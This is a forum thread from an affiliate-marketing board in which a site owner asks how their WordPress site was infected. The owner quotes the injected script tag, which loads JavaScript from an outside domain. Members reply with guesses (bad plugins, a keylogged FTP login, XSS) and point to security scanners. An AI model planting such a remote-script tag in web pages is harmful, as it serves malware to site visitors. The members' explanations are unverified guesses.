How can be a site infected?

Welcome to CPAElites - the original incentive CPA affiliate marketing forum online, solely based on "Cost Per Action".

Be a part of something great, join today! Learn CPA marketing with CPAElites, we will teach you everything such as the best CPA networks, CPA offers with highest payouts and best conversion rates, unsaturated CPA niches, most effective traffic sources and more.

99Installs

Well-known member
VIP Elites CPAElites Classic (1.0)
Joined
May 19, 2013
Messages
51
Reaction score
0
Hi,

Few days ago one of my site was infected. Somebody, I don't know how, enter this code in the source code of the page:

Code:
<script type="text/javascript" src="http://euforiaction.org/
js/framework.js">

Everytime when I enter on my site google show that this site contains malware.

How was it possible?
 

99Installs

Well-known member
VIP Elites CPAElites Classic (1.0)
Joined
May 19, 2013
Messages
51
Reaction score
0
ReadByte said:
You had a vulnerability in your site, or your host was hacked, or you uploaded a backdoored file.

My host wasn't hacked because they are very big company.

I don't upload any files than images.

What vulnerability can I have? Is the fault of the Wordpress plugins? I don't have any idea.
 

Tifax3

Well-known member
VIP Legends CPAElites Classic (1.0)
VIP Elites CPAElites Classic (1.0)
Joined
June 4, 2013
Messages
140
Reaction score
0
It can be your wordpress plugins.
Is that premium plugins you had for free ? If so that's probably infected plugins.
 

99Installs

Well-known member
VIP Elites CPAElites Classic (1.0)
Joined
May 19, 2013
Messages
51
Reaction score
0
Tifax3 said:
It can be your wordpress plugins.
Is that premium plugins you had for free ? If so that's probably infected plugins.

I had like 10 wordpress plugins, no premium, but I think they are the problem. The plugins are the only way to add code to my page.

After I deleted my site, with all it's files, I have only 2 plugins:

Wordpress SEO by Yoast
XML Sitemaps

Those are enough for me. :D
 

Blastoise

Well-known member
VIP Legends CPAElites Classic (1.0)
Joined
June 19, 2013
Messages
415
Reaction score
0
I would guess your computer is hacked and you were keylogged to get into FTP
 

99Installs

Well-known member
VIP Elites CPAElites Classic (1.0)
Joined
May 19, 2013
Messages
51
Reaction score
0
Blastoise said:
I would guess your computer is hacked and you were keylogged to get into FTP

No, I use licensed antivirus and I scan the computer but he don't find nothing.
 

Nuutero

Well-known member
VIP Legends CPAElites Classic (1.0)
Joined
June 9, 2013
Messages
571
Reaction score
0
ktalyn said:
Blastoise said:
I would guess your computer is hacked and you were keylogged to get into FTP

No, I use licensed antivirus and I scan the computer but he don't find nothing.

Can you give me the address of your WP page? I think I might be able to help you.
 

99Installs

Well-known member
VIP Elites CPAElites Classic (1.0)
Joined
May 19, 2013
Messages
51
Reaction score
0
Nuutero said:
ktalyn said:
Blastoise said:
I would guess your computer is hacked and you were keylogged to get into FTP

No, I use licensed antivirus and I scan the computer but he don't find nothing.

Can you give me the address of your WP page? I think I might be able to help you.

I solved the problem because I delete all from the host but I want to know how could be possible this and how to prevent it.
 

Nuutero

Well-known member
VIP Legends CPAElites Classic (1.0)
Joined
June 9, 2013
Messages
571
Reaction score
0
ktalyn said:
Nuutero said:
ktalyn said:
Blastoise said:
I would guess your computer is hacked and you were keylogged to get into FTP

No, I use licensed antivirus and I scan the computer but he don't find nothing.

Can you give me the address of your WP page? I think I might be able to help you.

I solved the problem because I delete all from the host but I want to know how could be possible this and how to prevent it.

Install security plugins to wordpress, don't install shady not much used plugins.

http://sucuri.net/
http://www.scanwp.com/
 

Vanity

Banned
Banned
Banned, please read member profile -> "About"
Joined
July 23, 2013
Messages
464
Reaction score
0
It looks like a clickjacking script.
Maybe there was a XSS on your site, and someone exploited it to forward people to his site.
 
Top Bottom